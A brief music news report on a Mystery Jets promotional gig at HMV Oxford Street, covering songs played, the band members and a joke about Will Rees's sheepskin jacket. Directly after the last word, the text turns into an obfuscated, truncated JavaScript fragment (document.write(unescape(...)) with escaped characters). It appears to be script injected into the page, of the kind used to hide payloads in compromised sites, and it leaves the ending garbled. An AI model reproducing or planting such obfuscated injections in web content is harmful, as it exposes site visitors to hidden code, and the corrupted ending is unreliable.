The Mystery Jets took the stage for a free gig to promote the classic new single 'The Boy Who Ran Away' at HMV Oxford Street yesterday evening. A jovial Will Rees joked with a lively crowd who saw the band perform amongst others ‘You Can't Fool Me Dennis' and ‘On My Feet' in a performance which was reminiscent of 80's heroes Dexy's Midnight Runners auditioning for a part in an uplifting theatrical production. Father and son Henry and Blaine were also in fine fettle as was the whole outfit, the album looms and should provide another welcome musical injection to an already vibrant top 40.
After being quizzed by Music News on the whereabouts of his trademark brown sheepskin leather jacket Will jovially stated, ‘It's over there', pointing to the floor. And MN can confirm it is alive and well.
An onlooker added, ‘This motley bunch might just hit the big time', we couldn't agree more. Brilliant.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
